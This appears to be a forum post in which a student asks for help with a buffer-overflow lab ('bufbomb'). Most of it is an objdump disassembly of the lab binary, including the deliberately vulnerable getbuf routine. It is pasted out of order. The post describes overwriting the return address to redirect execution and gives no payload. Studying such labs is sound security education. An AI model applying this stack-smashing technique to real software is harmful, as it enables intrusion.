8048e57: 83 c4 0c add $0xc,%esp
8048e5a: 5b pop %ebx
8048e5b: 5e pop %esi
8048e5c: 5f pop %edi
8048e5d: 5d pop %ebp
8048e5e: c3 ret
8048e5f: 90 nop
8048e60: 8b 45 f0 mov 0xfffffff0(%ebp),%eax
8048e63: bf 01 00 00 00 mov $0x1,%edi
8048e68: c1 e0 04 shl $0x4,%eax
8048e6b: 8d 04 02 lea (%edx,%eax,1),%eax
8048e6e: 88 06 mov %al,(%esi)
8048e70: 0f be c0 movsbl %al,%eax
8048e73: 83 c6 01 add $0x1,%esi
8048e76: e8 25 fa ff ff call 80488a0 <save_char>
8048e7b: e9 50 ff ff ff jmp 8048dd0 <Gets+0x30>
08048e80 <getbufn>:
8048e80: 55 push %ebp
8048e81: 89 e5 mov %esp,%ebp
8048e83: 81 ec 08 02 00 00 sub $0x208,%esp
8048e89: 8d 85 00 fe ff ff lea 0xfffffe00(%ebp),%eax
8048e8f: 89 04 24 mov %eax,(%esp)
8048e92: e8 09 ff ff ff call 8048da0 <Gets>
8048e97: b8 01 00 00 00 mov $0x1,%eax
8048e9c: c9 leave
8048e9d: c3 ret
8048e9e: 66 90 xchg %ax,%ax
08048ea0 <testn>:
8048ea0: 55 push %ebp
8048ea1: 89 e5 mov %esp,%ebp
8048ea3: 83 ec 18 sub $0x18,%esp
8048ea6: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%eb
8048ead: c7 04 24 04 00 00 00 movl $0x4,(%esp)
8048eb4: e8 37 fa ff ff call 80488f0 <entry_check>
8048eb9: e8 c2 ff ff ff call 8048e80 <getbufn>
8048ebe: 89 c2 mov %eax,%edx
8048ec0: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048ec3: 3d ef be ad de cmp $0xdeadbeef,%eax
8048ec8: 74 0e je 8048ed8 <testn+0x38>
8048eca: c7 04 24 50 97 04 08 movl $0x8049750,(%esp)
8048ed1: e8 be f8 ff ff call 8048794 <puts@plt>
8048ed6: c9 leave
8048ed7: c3 ret
8048ed8: 3b 15 b0 a1 04 08 cmp 0x804a1b0,%edx
8048ede: 74 12 je 8048ef2 <testn+0x52>
8048ee0: 89 54 24 04 mov %edx,0x4(%esp)
8048ee4: c7 04 24 ee 98 04 08 movl $0x80498ee,(%esp)
8048eeb: e8 34 f8 ff ff call 8048724 <printf@plt>
8048ef0: c9 leave
8048ef1: c3 ret
8048ef2: 89 54 24 04 mov %edx,0x4(%esp)
8048ef6: c7 04 24 7c 97 04 08 movl $0x804977c,(%esp)
8048efd: e8 22 f8 ff ff call 8048724 <printf@plt>
8048f02: c7 04 24 04 00 00 00 movl $0x4,(%esp)
8048f09: e8 22 fb ff ff call 8048a30 <validate>
8048f0e: c9 leave
8048f0f: c3 ret
08048f10 <getbuf>:
8048f10: 55 push %ebp
8048f11: 89 e5 mov %esp,%ebp
8048f13: 83 ec 18 sub $0x18,%esp
8048f16: 8d 45 f0 lea 0xfffffff0(%ebp),%eax
8048f19: 89 04 24 mov %eax,(%esp)
8048f1c: e8 7f fe ff ff call 8048da0 <Gets>
8048f21: b8 01 00 00 00 mov $0x1,%eax
8048f26: c9 leave
8048f27: c3 ret
8048f28: 90 nop
8048f29: 8d b4 26 00 00 00 00 lea 0x0(%esi),%esi
08048f30 <test>:
8048f30: 55 push %ebp
8048f31: 89 e5 mov %esp,%ebp
8048f33: 83 ec 18 sub $0x18,%esp
8048f36: c7 45 fc ef be ad de movl $0xdeadbeef,0xfffffffc(%eb
8048f3d: c7 04 24 03 00 00 00 movl $0x3,(%esp)
8048f44: e8 a7 f9 ff ff call 80488f0 <entry_check>
8048f49: e8 c2 ff ff ff call 8048f10 <getbuf>
8048f4e: 89 c2 mov %eax,%edx
8048f50: 8b 45 fc mov 0xfffffffc(%ebp),%eax
8048f53: 3d ef be ad de cmp $0xdeadbeef,%eax
8048f58: 74 0e je 8048f68 <test+0x38>
8048f5a: c7 04 24 50 97 04 08 movl $0x8049750,(%esp)
8048f61: e8 2e f8 ff ff call 8048794 <puts@plt>
8048f66: c9 leave
8048f67: c3 ret
8048f68: 3b 15 b0 a1 04 08 cmp 0x804a1b0,%edx
8048f6e: 74 12 je 8048f82 <test+0x52>
8048f70: 89 54 24 04 mov %edx,0x4(%esp)
8048f74: c7 04 24 27 99 04 08 movl $0x8049927,(%esp)
8048f7b: e8 a4 f7 ff ff call 8048724 <printf@plt>
8048f80: c9 leave
8048f81: c3 ret
8048f82: 89 54 24 04 mov %edx,0x4(%esp)
8048f86: c7 04 24 0a 99 04 08 movl $0x804990a,(%esp)
8048f8d: e8 92 f7 ff ff call 8048724 <printf@plt>
8048f92: c7 04 24 03 00 00 00 movl $0x3,(%esp)
8048f99: e8 92 fa ff ff call 8048a30 <validate>
8048f9e: c9 leave
8048f9f: c3 ret
08048fa0 <launch>:
8048fa0: 55 push %ebp
8048fa1: 89 e5 mov %esp,%ebp
8048fa3: 53 push %ebx
8048fa4: 89 c3 mov %eax,%ebx
8048fa6: 8d 45 bc lea 0xffffffbc(%ebp),%eax
8048fa9: 83 ec 54 sub $0x54,%esp
8048fac: 25 f8 3f 00 00 and $0x3ff8,%eax
8048fb1: 01 c2 add %eax,%edx
8048fb3: 8d 42 1e lea 0x1e(%edx),%eax
8048fb6: 83 e0 f0 and $0xfffffff0,%eax
8048fb9: 29 c4 sub %eax,%esp
8048fbb: 8d 44 24 1b lea 0x1b(%esp),%eax
8048fbf: 83 e0 f0 and $0xfffffff0,%eax
8048fc2: 89 54 24 08 mov %edx,0x8(%esp)
8048fc6: c7 44 24 04 f4 00 00 movl $0xf4,0x4(%esp)
8048fcd: 00
8048fce: 89 04 24 mov %eax,(%esp)
8048fd1: e8 be f6 ff ff call 8048694 <memset@plt>
8048fd6: a1 a8 a1 04 08 mov 0x804a1a8,%eax
8048fdb: 85 c0 test %eax,%eax
8048fdd: 75 15 jne 8048ff4 <launch+0x54>
8048fdf: a1 ac a1 04 08 mov 0x804a1ac,%eax
8048fe4: 85 c0 test %eax,%eax
8048fe6: 75 40 jne 8049028 <launch+0x88>
8048fe8: c7 04 24 53 99 04 08 movl $0x8049953,(%esp)
8048fef: e8 30 f7 ff ff call 8048724 <printf@plt>
8048ff4: 85 db test %ebx,%ebx
8048ff6: 74 29 je 8049021 <launch+0x81>
8048ff8: e8 a3 fe ff ff call 8048ea0 <testn>
8048ffd: a1 bc a1 04 08 mov 0x804a1bc,%eax
8049002: 85 c0 test %eax,%eax
8049004: 75 16 jne 804901c <launch+0x7c>
8049006: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
804900d: e8 82 f7 ff ff call 8048794 <puts@plt>
8049012: c7 05 bc a1 04 08 00 movl $0x0,0x804a1bc
8049019: 00 00 00
804901c: 8b 5d fc mov 0xfffffffc(%ebp),%ebx
804901f: c9 leave
8049020: c3 ret
8049021: e8 0a ff ff ff call 8048f30 <test>
8049026: eb d5 jmp 8048ffd <launch+0x5d>
8049028: c7 04 24 42 99 04 08 movl $0x8049942,(%esp)
804902f: e8 f0 f6 ff ff call 8048724 <printf@plt>
8049034: eb be jmp 8048ff4 <launch+0x54>
8049036: 8d 76 00 lea 0x0(%esi),%esi
8049039: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049040 <main>:
8049040: 8d 4c 24 04 lea 0x4(%esp),%ecx
8049044: 83 e4 f0 and $0xfffffff0,%esp
8049047: ff 71 fc pushl 0xfffffffc(%ecx)
804904a: 55 push %ebp
804904b: 89 e5 mov %esp,%ebp
804904d: 57 push %edi
804904e: 56 push %esi
804904f: 53 push %ebx
8049050: 51 push %ecx
8049051: 83 ec 18 sub $0x18,%esp
8049054: 8b 31 mov (%ecx),%esi
8049056: 8b 59 04 mov 0x4(%ecx),%ebx
8049059: c7 44 24 04 70 89 04 movl $0x8048970,0x4(%esp)
8049060: 08
8049061: c7 04 24 0b 00 00 00 movl $0xb,(%esp)
8049068: e8 e7 f5 ff ff call 8048654 <signal@plt>
804906d: c7 44 24 04 a0 89 04 movl $0x80489a0,0x4(%esp)
8049074: 08
8049075: c7 04 24 07 00 00 00 movl $0x7,(%esp)
804907c: e8 d3 f5 ff ff call 8048654 <signal@plt>
8049081: c7 44 24 04 30 89 04 movl $0x8048930,0x4(%esp)
8049088: 08
8049089: c7 04 24 0e 00 00 00 movl $0xe,(%esp)
8049090: e8 bf f5 ff ff call 8048654 <signal@plt>
8049095: c7 44 24 04 00 89 04 movl $0x8048900,0x4(%esp)
804909c: 08
804909d: c7 04 24 04 00 00 00 movl $0x4,(%esp)
80490a4: e8 ab f5 ff ff call 8048654 <signal@plt>
80490a9: a1 80 a1 04 08 mov 0x804a180,%eax
80490ae: c7 45 e8 00 00 00 00 movl $0x0,0xffffffe8(%ebp)
80490b5: c7 45 ec 01 00 00 00 movl $0x1,0xffffffec(%ebp)
80490bc: a3 a0 a1 04 08 mov %eax,0x804a1a0
80490c1: c7 44 24 08 8f 99 04 movl $0x804998f,0x8(%esp)
80490c8: 08
80490c9: 89 5c 24 04 mov %ebx,0x4(%esp)
80490cd: 89 34 24 mov %esi,(%esp)
80490d0: e8 0f f6 ff ff call 80486e4 <getopt@plt>
80490d5: 3c ff cmp $0xff,%al
80490d7: 0f 84 04 01 00 00 je 80491e1 <main+0x1a1>
80490dd: 83 e8 66 sub $0x66,%eax
80490e0: 3c 12 cmp $0x12,%al
80490e2: 77 0c ja 80490f0 <main+0xb0>
80490e4: 0f b6 c0 movzbl %al,%eax
80490e7: ff 24 85 98 99 04 08 jmp *0x8049998(,%eax,4)
80490ee: 66 90 xchg %ax,%ax
80490f0: 8b 03 mov (%ebx),%eax
80490f2: e8 d9 f8 ff ff call 80489d0 <usage>
80490f7: eb c8 jmp 80490c1 <main+0x81>
80490f9: c7 05 b8 a1 04 08 01 movl $0x1,0x804a1b8
8049100: 00 00 00
8049103: c7 05 a8 a1 04 08 01 movl $0x1,0x804a1a8
804910a: 00 00 00
804910d: c7 05 68 a1 04 08 01 movl $0x1,0x804a168
8049114: 00 00 00
8049117: eb a8 jmp 80490c1 <main+0x81>
8049119: c7 44 24 04 78 99 04 movl $0x8049978,0x4(%esp)
8049120: 08
8049121: a1 84 a1 04 08 mov 0x804a184,%eax
8049126: 89 04 24 mov %eax,(%esp)
8049129: e8 c6 f5 ff ff call 80486f4 <fopen@plt>
804912e: 85 c0 test %eax,%eax
8049130: a3 a0 a1 04 08 mov %eax,0x804a1a0
8049135: 75 8a jne 80490c1 <main+0x81>
8049137: a1 84 a1 04 08 mov 0x804a184,%eax
804913c: c7 04 24 7a 99 04 08 movl $0x804997a,(%esp)
8049143: 89 44 24 04 mov %eax,0x4(%esp)
8049147: e8 d8 f5 ff ff call 8048724 <printf@plt>
804914c: 8b 03 mov (%ebx),%eax
804914e: e8 7d f8 ff ff call 80489d0 <usage>
8049153: e9 69 ff ff ff jmp 80490c1 <main+0x81>
8049158: c7 45 e8 01 00 00 00 movl $0x1,0xffffffe8(%ebp)
804915f: c7 45 ec 05 00 00 00 movl $0x5,0xffffffec(%ebp)
8049166: e9 56 ff ff ff jmp 80490c1 <main+0x81>
804916b: c7 05 a8 a1 04 08 01 movl $0x1,0x804a1a8
8049172: 00 00 00
8049175: e9 47 ff ff ff jmp 80490c1 <main+0x81>
804917a: c7 05 a4 a1 04 08 01 movl $0x1,0x804a1a4
8049181: 00 00 00
8049184: e9 38 ff ff ff jmp 80490c1 <main+0x81>
8049189: a1 84 a1 04 08 mov 0x804a184,%eax
804918e: 89 04 24 mov %eax,(%esp)
8049191: e8 2e f6 ff ff call 80487c4 <__strdup@plt>
8049196: a3 b4 a1 04 08 mov %eax,0x804a1b4
804919b: 89 44 24 04 mov %eax,0x4(%esp)
804919f: c7 04 24 60 99 04 08 movl $0x8049960,(%esp)
80491a6: e8 79 f5 ff ff call 8048724 <printf@plt>
80491ab: a1 b4 a1 04 08 mov 0x804a1b4,%eax
80491b0: 89 04 24 mov %eax,(%esp)
80491b3: e8 88 01 00 00 call 8049340 <gencookie>
80491b8: a3 b0 a1 04 08 mov %eax,0x804a1b0
80491bd: 89 44 24 04 mov %eax,0x4(%esp)
80491c1: c7 04 24 6a 99 04 08 movl $0x804996a,(%esp)
80491c8: e8 57 f5 ff ff call 8048724 <printf@plt>
80491cd: e9 ef fe ff ff jmp 80490c1 <main+0x81>
80491d2: c7 05 ac a1 04 08 01 movl $0x1,0x804a1ac
80491d9: 00 00 00
80491dc: e9 e0 fe ff ff jmp 80490c1 <main+0x81>
80491e1: a1 b4 a1 04 08 mov 0x804a1b4,%eax
80491e6: 85 c0 test %eax,%eax
80491e8: 0f 84 d2 00 00 00 je 80492c0 <main+0x280>
80491ee: a1 b0 a1 04 08 mov 0x804a1b0,%eax
80491f3: 89 04 24 mov %eax,(%esp)
80491f6: e8 39 f5 ff ff call 8048734 <srandom@plt>
80491fb: e8 44 f4 ff ff call 8048644 <random@plt>
8049200: 25 f8 0f 00 00 and $0xff8,%eax
8049205: 89 45 e4 mov %eax,0xffffffe4(%ebp)
8049208: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp)
804920f: 00
8049210: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049213: 89 04 24 mov %eax,(%esp)
8049216: e8 59 f4 ff ff call 8048674 <calloc@plt>
804921b: 89 c7 mov %eax,%edi
804921d: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049220: 83 e8 02 sub $0x2,%eax
8049223: 85 c0 test %eax,%eax
8049225: 7e 1e jle 8049245 <main+0x205>
8049227: 8b 55 ec mov 0xffffffec(%ebp),%edx
804922a: bb 01 00 00 00 mov $0x1,%ebx
804922f: 8d 72 ff lea 0xffffffff(%edx),%esi
8049232: e8 0d f4 ff ff call 8048644 <random@plt>
8049237: 83 e0 38 and $0x38,%eax
804923a: 89 44 9f fc mov %eax,0xfffffffc(%edi,%ebx,
804923e: 83 c3 01 add $0x1,%ebx
8049241: 39 f3 cmp %esi,%ebx
8049243: 75 ed jne 8049232 <main+0x1f2>
8049245: 83 7d ec 01 cmpl $0x1,0xffffffec(%ebp)
8049249: 7e 49 jle 8049294 <main+0x254>
804924b: 8b 55 ec mov 0xffffffec(%ebp),%edx
804924e: 8d 04 97 lea (%edi,%edx,4),%eax
8049251: c7 40 f8 38 00 00 00 movl $0x38,0xfffffff8(%eax)
8049258: c7 40 fc 00 00 00 00 movl $0x0,0xfffffffc(%eax)
804925f: a1 68 a1 04 08 mov 0x804a168,%eax
8049264: 89 04 24 mov %eax,(%esp)
8049267: e8 98 f4 ff ff call 8048704 <alarm@plt>
804926c: 31 db xor %ebx,%ebx
804926e: 66 90 xchg %ax,%ax
8049270: 8b 55 e4 mov 0xffffffe4(%ebp),%edx
8049273: 8b 45 e8 mov 0xffffffe8(%ebp),%eax
8049276: 03 14 9f add (%edi,%ebx,4),%edx
8049279: 83 c3 01 add $0x1,%ebx
804927c: e8 1f fd ff ff call 8048fa0 <launch>
8049281: 3b 5d ec cmp 0xffffffec(%ebp),%ebx
8049284: 7c ea jl 8049270 <main+0x230>
8049286: 83 c4 18 add $0x18,%esp
8049289: 31 c0 xor %eax,%eax
804928b: 59 pop %ecx
804928c: 5b pop %ebx
804928d: 5e pop %esi
804928e: 5f pop %edi
804928f: 5d pop %ebp
8049290: 8d 61 fc lea 0xfffffffc(%ecx),%esp
8049293: c3 ret
8049294: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049297: c7 44 87 fc 00 00 00 movl $0x0,0xfffffffc(%edi,%eax,
804929e: 00
804929f: a1 68 a1 04 08 mov 0x804a168,%eax
80492a4: 89 04 24 mov %eax,(%esp)
80492a7: e8 58 f4 ff ff call 8048704 <alarm@plt>
80492ac: 83 7d ec 01 cmpl $0x1,0xffffffec(%ebp)
80492b0: 74 ba je 804926c <main+0x22c>
80492b2: 83 c4 18 add $0x18,%esp
80492b5: 31 c0 xor %eax,%eax
80492b7: 59 pop %ecx
80492b8: 5b pop %ebx
80492b9: 5e pop %esi
80492ba: 5f pop %edi
80492bb: 5d pop %ebp
80492bc: 8d 61 fc lea 0xfffffffc(%ecx),%esp
80492bf: c3 ret
80492c0: c7 04 24 9c 97 04 08 movl $0x804979c,(%esp)
80492c7: e8 c8 f4 ff ff call 8048794 <puts@plt>
80492cc: 8b 03 mov (%ebx),%eax
80492ce: e8 fd f6 ff ff call 80489d0 <usage>
80492d3: e9 16 ff ff ff jmp 80491ee <main+0x1ae>
80492d8: 90 nop
80492d9: 90 nop
80492da: 90 nop
80492db: 90 nop
80492dc: 90 nop
80492dd: 90 nop
80492de: 90 nop
80492df: 90 nop
080492e0 <hash>:
80492e0: 55 push %ebp
80492e1: 31 c0 xor %eax,%eax
80492e3: 89 e5 mov %esp,%ebp
80492e5: 8b 4d 08 mov 0x8(%ebp),%ecx
80492e8: 0f b6 11 movzbl (%ecx),%edx
80492eb: 84 d2 test %dl,%dl
80492ed: 74 15 je 8049304 <hash+0x24>
80492ef: 90 nop
80492f0: 6b c0 67 imul $0x67,%eax,%eax
80492f3: 0f be d2 movsbl %dl,%edx
80492f6: 8d 04 02 lea (%edx,%eax,1),%eax
80492f9: 0f b6 51 01 movzbl 0x1(%ecx),%edx
80492fd: 83 c1 01 add $0x1,%ecx
8049300: 84 d2 test %dl,%dl
8049302: 75 ec jne 80492f0 <hash+0x10>
8049304: 5d pop %ebp
8049305: c3 ret
8049306: 8d 76 00 lea 0x0(%esi),%esi
8049309: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049310 <check>:
8049310: 55 push %ebp
8049311: 89 e5 mov %esp,%ebp
8049313: 8b 55 08 mov 0x8(%ebp),%edx
8049316: 89 d0 mov %edx,%eax
8049318: c1 e8 1c shr $0x1c,%eax
804931b: 85 c0 test %eax,%eax
804931d: 74 19 je 8049338 <check+0x28>
804931f: 31 c9 xor %ecx,%ecx
8049321: 89 d0 mov %edx,%eax
8049323: d3 e8 shr %cl,%eax
8049325: 3c 0a cmp $0xa,%al
8049327: 74 0f je 8049338 <check+0x28>
8049329: 83 c1 08 add $0x8,%ecx
804932c: 83 f9 20 cmp $0x20,%ecx
804932f: 75 f0 jne 8049321 <check+0x11>
8049331: 5d pop %ebp
8049332: b8 01 00 00 00 mov $0x1,%eax
8049337: c3 ret
8049338: 5d pop %ebp
8049339: 31 c0 xor %eax,%eax
804933b: c3 ret
804933c: 8d 74 26 00 lea 0x0(%esi),%esi
08049340 <gencookie>:
8049340: 55 push %ebp
8049341: 89 e5 mov %esp,%ebp
8049343: 53 push %ebx
8049344: 83 ec 04 sub $0x4,%esp
8049347: 8b 45 08 mov 0x8(%ebp),%eax
804934a: 89 04 24 mov %eax,(%esp)
804934d: e8 8e ff ff ff call 80492e0 <hash>
8049352: 89 04 24 mov %eax,(%esp)
8049355: e8 da f2 ff ff call 8048634 <srand@plt>
804935a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8049360: e8 3f f4 ff ff call 80487a4 <rand@plt>
8049365: 89 c3 mov %eax,%ebx
8049367: 89 04 24 mov %eax,(%esp)
804936a: e8 a1 ff ff ff call 8049310 <check>
804936f: 85 c0 test %eax,%eax
8049371: 74 ed je 8049360 <gencookie+0x20>
8049373: 89 d8 mov %ebx,%eax
8049375: 83 c4 04 add $0x4,%esp
8049378: 5b pop %ebx
8049379: 5d pop %ebp
804937a: c3 ret
804937b: 90 nop
804937c: 90 nop
804937d: 90 nop
804937e: 90 nop
804937f: 90 nop
08049380 <__libc_csu_fini>:
8049380: 55 push %ebp
8049381: 89 e5 mov %esp,%ebp
8049383: 5d pop %ebp
8049384: c3 ret
8049385: 8d 74 26 00 lea 0x0(%esi),%esi
8049389: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049390 <__libc_csu_init>:
8049390: 55 push %ebp
8049391: 89 e5 mov %esp,%ebp
8049393: 57 push %edi
8049394: 56 push %esi
8049395: 53 push %ebx
8049396: e8 5e 00 00 00 call 80493f9 <__i686.get_pc_thunk.bx>
804939b: 81 c3 45 0d 00 00 add $0xd45,%ebx
80493a1: 83 ec 1c sub $0x1c,%esp
80493a4: e8 53 f2 ff ff call 80485fc <_init>
80493a9: 8d 83 20 ff ff ff lea 0xffffff20(%ebx),%eax
80493af: 89 45 f0 mov %eax,0xfffffff0(%ebp)
80493b2: 8d 83 20 ff ff ff lea 0xffffff20(%ebx),%eax
80493b8: 29 45 f0 sub %eax,0xfffffff0(%ebp)
80493bb: c1 7d f0 02 sarl $0x2,0xfffffff0(%ebp)
80493bf: 8b 55 f0 mov 0xfffffff0(%ebp),%edx
80493c2: 85 d2 test %edx,%edx
80493c4: 74 2b je 80493f1 <__libc_csu_init+0x61>
80493c6: 31 ff xor %edi,%edi
80493c8: 89 c6 mov %eax,%esi
80493ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
80493d0: 8b 45 10 mov 0x10(%ebp),%eax
80493d3: 83 c7 01 add $0x1,%edi
80493d6: 89 44 24 08 mov %eax,0x8(%esp)
80493da: 8b 45 0c mov 0xc(%ebp),%eax
80493dd: 89 44 24 04 mov %eax,0x4(%esp)
80493e1: 8b 45 08 mov 0x8(%ebp),%eax
80493e4: 89 04 24 mov %eax,(%esp)
80493e7: ff 16 call *(%esi)
80493e9: 83 c6 04 add $0x4,%esi
80493ec: 39 7d f0 cmp %edi,0xfffffff0(%ebp)
80493ef: 75 df jne 80493d0 <__libc_csu_init+0x40>
80493f1: 83 c4 1c add $0x1c,%esp
80493f4: 5b pop %ebx
80493f5: 5e pop %esi
80493f6: 5f pop %edi
80493f7: 5d pop %ebp
80493f8: c3 ret
080493f9 <__i686.get_pc_thunk.bx>:
80493f9: 8b 1c 24 mov (%esp),%ebx
80493fc: c3 ret
80493fd: 90 nop
80493fe: 90 nop
80493ff: 90 nop
08049400 <__do_global_ctors_aux>:
8049400: 55 push %ebp
8049401: 89 e5 mov %esp,%ebp
8049403: 53 push %ebx
8049404: bb 00 a0 04 08 mov $0x804a000,%ebx
8049409: 83 ec 04 sub $0x4,%esp
804940c: a1 00 a0 04 08 mov 0x804a000,%eax
8049411: 83 f8 ff cmp $0xffffffff,%eax
8049414: 74 0c je 8049422 <__do_global_ctors_aux+0x2
8049416: 83 eb 04 sub $0x4,%ebx
8049419: ff d0 call *%eax
804941b: 8b 03 mov (%ebx),%eax
804941d: 83 f8 ff cmp $0xffffffff,%eax
8049420: 75 f4 jne 8049416 <__do_global_ctors_aux+0x1
8049422: 83 c4 04 add $0x4,%esp
8049425: 5b pop %ebx
8049426: 5d pop %ebp
8049427: c3 ret
Disassembly of section .fini:
08049428 <_fini>:
8049428: 55 push %ebp
8049429: 89 e5 mov %esp,%ebp
804942b: 53 push %ebx
804942c: 83 ec 04 sub $0x4,%esp
804942f: e8 00 00 00 00 call 8049434 <_fini+0xc>
8049434: 5b pop %ebx
8049435: 81 c3 ac 0c 00 00 add $0xcac,%ebx
804943b: e8 00 f4 ff ff call 8048840 <__do_global_dtors_aux>
8049440: 59 pop %ecx
8049441: 5b pop %ebx
8049442: c9 leave
8049443: c3 ret
-bash-3.1$
The first level is to get bufbomb to execute the code for smoke when getbuf executes its return statement rather than returning to test by providing a string to overwrite the buffer. I am not very sure what that means and how to do this level. I think by knowing how to do this level I will be able to do other level
Thanks and please help
infinity08?? Where are you
I have a homework in which I need to enter a string so that the buffer bomb does not exploit and need some help. Here is the disassembly code for the bomb
-bash-3.1$ objdump -d bufbomb
bufbomb: file format elf32-i386
Disassembly of section .init:
080485fc <_init>:
80485fc: 55 push %ebp
80485fd: 89 e5 mov %esp,%ebp
80485ff: 83 ec 08 sub $0x8,%esp
8048602: e8 0d 02 00 00 call 8048814 <call_gmon_start>
8048607: e8 64 02 00 00 call 8048870 <frame_dummy>
804860c: e8 ef 0d 00 00 call 8049400 <__do_global_ctors_aux>
8048611: c9 leave
8048612: c3 ret
Disassembly of section .plt:
08048614 <sprintf@plt-0x10>:
8048614: ff 35 e4 a0 04 08 pushl 0x804a0e4
804861a: ff 25 e8 a0 04 08 jmp *0x804a0e8
8048620: 00 00 add %al,(%eax)
...
08048624 <sprintf@plt>:
8048624: ff 25 ec a0 04 08 jmp *0x804a0ec
804862a: 68 00 00 00 00 push $0x0
804862f: e9 e0 ff ff ff jmp 8048614 <_init+0x18>
08048634 <srand@plt>:
8048634: ff 25 f0 a0 04 08 jmp *0x804a0f0
804863a: 68 08 00 00 00 push $0x8
804863f: e9 d0 ff ff ff jmp 8048614 <_init+0x18>
08048644 <random@plt>:
8048644: ff 25 f4 a0 04 08 jmp *0x804a0f4
804864a: 68 10 00 00 00 push $0x10
804864f: e9 c0 ff ff ff jmp 8048614 <_init+0x18>
08048654 <signal@plt>:
8048654: ff 25 f8 a0 04 08 jmp *0x804a0f8
804865a: 68 18 00 00 00 push $0x18
804865f: e9 b0 ff ff ff jmp 8048614 <_init+0x18>
08048664 <__gmon_start__@plt>:
8048664: ff 25 fc a0 04 08 jmp *0x804a0fc
804866a: 68 20 00 00 00 push $0x20
804866f: e9 a0 ff ff ff jmp 8048614 <_init+0x18>
08048674 <calloc@plt>:
8048674: ff 25 00 a1 04 08 jmp *0x804a100
804867a: 68 28 00 00 00 push $0x28
804867f: e9 90 ff ff ff jmp 8048614 <_init+0x18>
08048684 <system@plt>:
8048684: ff 25 04 a1 04 08 jmp *0x804a104
804868a: 68 30 00 00 00 push $0x30
804868f: e9 80 ff ff ff jmp 8048614 <_init+0x18>
08048694 <memset@plt>:
8048694: ff 25 08 a1 04 08 jmp *0x804a108
804869a: 68 38 00 00 00 push $0x38
804869f: e9 70 ff ff ff jmp 8048614 <_init+0x18>
080486a4 <__libc_start_main@plt>:
80486a4: ff 25 0c a1 04 08 jmp *0x804a10c
80486aa: 68 40 00 00 00 push $0x40
80486af: e9 60 ff ff ff jmp 8048614 <_init+0x18>
080486b4 <_IO_getc@plt>:
80486b4: ff 25 10 a1 04 08 jmp *0x804a110
80486ba: 68 48 00 00 00 push $0x48
80486bf: e9 50 ff ff ff jmp 8048614 <_init+0x18>
080486c4 <__ctype_b_loc@plt>:
80486c4: ff 25 14 a1 04 08 jmp *0x804a114
80486ca: 68 50 00 00 00 push $0x50
80486cf: e9 40 ff ff ff jmp 8048614 <_init+0x18>
080486d4 <fclose@plt>:
80486d4: ff 25 18 a1 04 08 jmp *0x804a118
80486da: 68 58 00 00 00 push $0x58
80486df: e9 30 ff ff ff jmp 8048614 <_init+0x18>
080486e4 <getopt@plt>:
80486e4: ff 25 1c a1 04 08 jmp *0x804a11c
80486ea: 68 60 00 00 00 push $0x60
80486ef: e9 20 ff ff ff jmp 8048614 <_init+0x18>
080486f4 <fopen@plt>:
80486f4: ff 25 20 a1 04 08 jmp *0x804a120
80486fa: 68 68 00 00 00 push $0x68
80486ff: e9 10 ff ff ff jmp 8048614 <_init+0x18>
08048704 <alarm@plt>:
8048704: ff 25 24 a1 04 08 jmp *0x804a124
804870a: 68 70 00 00 00 push $0x70
804870f: e9 00 ff ff ff jmp 8048614 <_init+0x18>
08048714 <strcpy@plt>:
8048714: ff 25 28 a1 04 08 jmp *0x804a128
804871a: 68 78 00 00 00 push $0x78
804871f: e9 f0 fe ff ff jmp 8048614 <_init+0x18>
08048724 <printf@plt>:
8048724: ff 25 2c a1 04 08 jmp *0x804a12c
804872a: 68 80 00 00 00 push $0x80
804872f: e9 e0 fe ff ff jmp 8048614 <_init+0x18>
08048734 <srandom@plt>:
8048734: ff 25 30 a1 04 08 jmp *0x804a130
804873a: 68 88 00 00 00 push $0x88
804873f: e9 d0 fe ff ff jmp 8048614 <_init+0x18>
08048744 <fwrite@plt>:
8048744: ff 25 34 a1 04 08 jmp *0x804a134
804874a: 68 90 00 00 00 push $0x90
804874f: e9 c0 fe ff ff jmp 8048614 <_init+0x18>
08048754 <fprintf@plt>:
8048754: ff 25 38 a1 04 08 jmp *0x804a138
804875a: 68 98 00 00 00 push $0x98
804875f: e9 b0 fe ff ff jmp 8048614 <_init+0x18>
08048764 <remove@plt>:
8048764: ff 25 3c a1 04 08 jmp *0x804a13c
804876a: 68 a0 00 00 00 push $0xa0
804876f: e9 a0 fe ff ff jmp 8048614 <_init+0x18>
08048774 <cuserid@plt>:
8048774: ff 25 40 a1 04 08 jmp *0x804a140
804877a: 68 a8 00 00 00 push $0xa8
804877f: e9 90 fe ff ff jmp 8048614 <_init+0x18>
08048784 <fputc@plt>:
8048784: ff 25 44 a1 04 08 jmp *0x804a144
804878a: 68 b0 00 00 00 push $0xb0
804878f: e9 80 fe ff ff jmp 8048614 <_init+0x18>
08048794 <puts@plt>:
8048794: ff 25 48 a1 04 08 jmp *0x804a148
804879a: 68 b8 00 00 00 push $0xb8
804879f: e9 70 fe ff ff jmp 8048614 <_init+0x18>
080487a4 <rand@plt>:
80487a4: ff 25 4c a1 04 08 jmp *0x804a14c
80487aa: 68 c0 00 00 00 push $0xc0
80487af: e9 60 fe ff ff jmp 8048614 <_init+0x18>
080487b4 <tempnam@plt>:
80487b4: ff 25 50 a1 04 08 jmp *0x804a150
80487ba: 68 c8 00 00 00 push $0xc8
80487bf: e9 50 fe ff ff jmp 8048614 <_init+0x18>
080487c4 <__strdup@plt>:
80487c4: ff 25 54 a1 04 08 jmp *0x804a154
80487ca: 68 d0 00 00 00 push $0xd0
80487cf: e9 40 fe ff ff jmp 8048614 <_init+0x18>
080487d4 <exit@plt>:
80487d4: ff 25 58 a1 04 08 jmp *0x804a158
80487da: 68 d8 00 00 00 push $0xd8
80487df: e9 30 fe ff ff jmp 8048614 <_init+0x18>
Disassembly of section .text:
080487f0 <_start>:
80487f0: 31 ed xor %ebp,%ebp
80487f2: 5e pop %esi
80487f3: 89 e1 mov %esp,%ecx
80487f5: 83 e4 f0 and $0xfffffff0,%esp
